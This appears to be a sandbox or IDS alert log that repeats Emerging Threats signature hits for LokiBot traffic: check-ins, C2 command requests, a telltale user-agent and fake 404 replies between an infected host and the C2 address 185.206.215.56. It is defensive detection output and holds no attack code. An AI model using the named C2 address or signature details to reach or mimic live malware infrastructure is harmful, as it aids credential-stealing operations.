                                                                                        01/05/21-19:06:53.527158TCP2025381ET TROJAN LokiBot Checkin4928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.527158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.705442TCP2025483ET TROJAN LokiBot Fake 404 Response8049285185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:53.922499TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.922499TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.922499TCP2025381ET TROJAN LokiBot Checkin4928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:53.922499TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.077631TCP2025483ET TROJAN LokiBot Fake 404 Response8049286185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:54.285753TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.285753TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.285753TCP2025381ET TROJAN LokiBot Checkin4928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.285753TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.453918TCP2025483ET TROJAN LokiBot Fake 404 Response8049287185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:54.662267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.662267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.662267TCP2025381ET TROJAN LokiBot Checkin4928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.662267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:54.864166TCP2025483ET TROJAN LokiBot Fake 404 Response8049288185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:55.070986TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.070986TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.070986TCP2025381ET TROJAN LokiBot Checkin4928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.070986TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24928980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.223019TCP2025483ET TROJAN LokiBot Fake 404 Response8049289185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:55.427131TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.427131TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.427131TCP2025381ET TROJAN LokiBot Checkin4929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.427131TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.590567TCP2025483ET TROJAN LokiBot Fake 404 Response8049290185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:55.812036TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.812036TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.812036TCP2025381ET TROJAN LokiBot Checkin4929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.812036TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:55.997742TCP2025483ET TROJAN LokiBot Fake 404 Response8049291185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:56.213303TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.213303TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.213303TCP2025381ET TROJAN LokiBot Checkin4929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.213303TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.397187TCP2025483ET TROJAN LokiBot Fake 404 Response8049292185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:56.594263TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.594263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.594263TCP2025381ET TROJAN LokiBot Checkin4929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.594263TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.764004TCP2025483ET TROJAN LokiBot Fake 404 Response8049293185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:56.973338TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.973338TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.973338TCP2025381ET TROJAN LokiBot Checkin4929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:56.973338TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.143234TCP2025483ET TROJAN LokiBot Fake 404 Response8049294185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:57.346021TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.346021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.346021TCP2025381ET TROJAN LokiBot Checkin4929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.346021TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.532123TCP2025483ET TROJAN LokiBot Fake 404 Response8049295185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:57.742988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.742988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.742988TCP2025381ET TROJAN LokiBot Checkin4929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.742988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:57.910447TCP2025483ET TROJAN LokiBot Fake 404 Response8049296185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:58.107472TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.107472TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.107472TCP2025381ET TROJAN LokiBot Checkin4929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.107472TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.291278TCP2025483ET TROJAN LokiBot Fake 404 Response8049297185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:58.499485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.499485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.499485TCP2025381ET TROJAN LokiBot Checkin4929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.499485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.677455TCP2025483ET TROJAN LokiBot Fake 404 Response8049298185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:58.918368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.918368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.918368TCP2025381ET TROJAN LokiBot Checkin4929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:58.918368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24929980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.104108TCP2025483ET TROJAN LokiBot Fake 404 Response8049299185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:59.313559TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.313559TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.313559TCP2025381ET TROJAN LokiBot Checkin4930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.313559TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.474234TCP2025483ET TROJAN LokiBot Fake 404 Response8049300185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:59.687246TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.687246TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.687246TCP2025381ET TROJAN LokiBot Checkin4930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.687246TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:59.847928TCP2025483ET TROJAN LokiBot Fake 404 Response8049301185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:00.058160TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.058160TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.058160TCP2025381ET TROJAN LokiBot Checkin4930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.058160TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.228246TCP2025483ET TROJAN LokiBot Fake 404 Response8049302185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:00.450812TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.450812TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.450812TCP2025381ET TROJAN LokiBot Checkin4930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.450812TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.618919TCP2025483ET TROJAN LokiBot Fake 404 Response8049303185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:00.828363TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.828363TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.828363TCP2025381ET TROJAN LokiBot Checkin4930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.828363TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:00.993556TCP2025483ET TROJAN LokiBot Fake 404 Response8049304185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:01.210699TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.210699TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.210699TCP2025381ET TROJAN LokiBot Checkin4930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.210699TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.363213TCP2025483ET TROJAN LokiBot Fake 404 Response8049305185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:01.575817TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.575817TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.575817TCP2025381ET TROJAN LokiBot Checkin4930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.575817TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.750904TCP2025483ET TROJAN LokiBot Fake 404 Response8049306185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:01.975553TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.975553TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.975553TCP2025381ET TROJAN LokiBot Checkin4930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:01.975553TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.132845TCP2025483ET TROJAN LokiBot Fake 404 Response8049307185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:02.334169TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.334169TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.334169TCP2025381ET TROJAN LokiBot Checkin4930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.334169TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.488881TCP2025483ET TROJAN LokiBot Fake 404 Response8049308185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:02.695433TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.695433TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.695433TCP2025381ET TROJAN LokiBot Checkin4930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.695433TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24930980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:02.863488TCP2025483ET TROJAN LokiBot Fake 404 Response8049309185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:03.081979TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.081979TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.081979TCP2025381ET TROJAN LokiBot Checkin4931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.081979TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.240915TCP2025483ET TROJAN LokiBot Fake 404 Response8049310185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:03.437460TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.437460TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.437460TCP2025381ET TROJAN LokiBot Checkin4931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.437460TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.601073TCP2025483ET TROJAN LokiBot Fake 404 Response8049311185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:03.817487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2025381ET TROJAN LokiBot Checkin4931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.817487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:03.979353TCP2025483ET TROJAN LokiBot Fake 404 Response8049312185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.190227TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2025381ET TROJAN LokiBot Checkin4931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.190227TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.351678TCP2025483ET TROJAN LokiBot Fake 404 Response8049313185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.554889TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2025381ET TROJAN LokiBot Checkin4931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.554889TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.731423TCP2025483ET TROJAN LokiBot Fake 404 Response8049314185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:04.946051TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2025381ET TROJAN LokiBot Checkin4931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:04.946051TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.124758TCP2025483ET TROJAN LokiBot Fake 404 Response8049315185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:05.334400TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2025381ET TROJAN LokiBot Checkin4931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.334400TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.505004TCP2025483ET TROJAN LokiBot Fake 404 Response8049316185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:05.711231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2025381ET TROJAN LokiBot Checkin4931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.711231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:05.862498TCP2025483ET TROJAN LokiBot Fake 404 Response8049317185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.056308TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2025381ET TROJAN LokiBot Checkin4931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.056308TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.254066TCP2025483ET TROJAN LokiBot Fake 404 Response8049318185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.456725TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2025381ET TROJAN LokiBot Checkin4931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.456725TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24931980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.617598TCP2025483ET TROJAN LokiBot Fake 404 Response8049319185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:06.823587TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2025381ET TROJAN LokiBot Checkin4932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.823587TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:06.974484TCP2025483ET TROJAN LokiBot Fake 404 Response8049320185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.184056TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2025381ET TROJAN LokiBot Checkin4932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.184056TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.346312TCP2025483ET TROJAN LokiBot Fake 404 Response8049321185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.553003TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2025381ET TROJAN LokiBot Checkin4932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.553003TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.742274TCP2025483ET TROJAN LokiBot Fake 404 Response8049322185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:07.954109TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2025381ET TROJAN LokiBot Checkin4932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:07.954109TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.126146TCP2025483ET TROJAN LokiBot Fake 404 Response8049323185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:08.324968TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2025381ET TROJAN LokiBot Checkin4932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.324968TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.523216TCP2025483ET TROJAN LokiBot Fake 404 Response8049324185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:08.752322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2025381ET TROJAN LokiBot Checkin4932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.752322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:08.911141TCP2025483ET TROJAN LokiBot Fake 404 Response8049325185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.107951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2025381ET TROJAN LokiBot Checkin4932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.107951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.274146TCP2025483ET TROJAN LokiBot Fake 404 Response8049326185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.490262TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2025381ET TROJAN LokiBot Checkin4932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.490262TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.668226TCP2025483ET TROJAN LokiBot Fake 404 Response8049327185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:09.873125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2025381ET TROJAN LokiBot Checkin4932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:09.873125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.024941TCP2025483ET TROJAN LokiBot Fake 404 Response8049328185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:10.232858TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2025381ET TROJAN LokiBot Checkin4932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.232858TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24932980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.470073TCP2025483ET TROJAN LokiBot Fake 404 Response8049329185.206.215.56192.168.2.22
                                                                                        01/05/21-19:07:10.663115TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14933080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:07:10.663115TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4933080192.168.2.22185.206.215.56
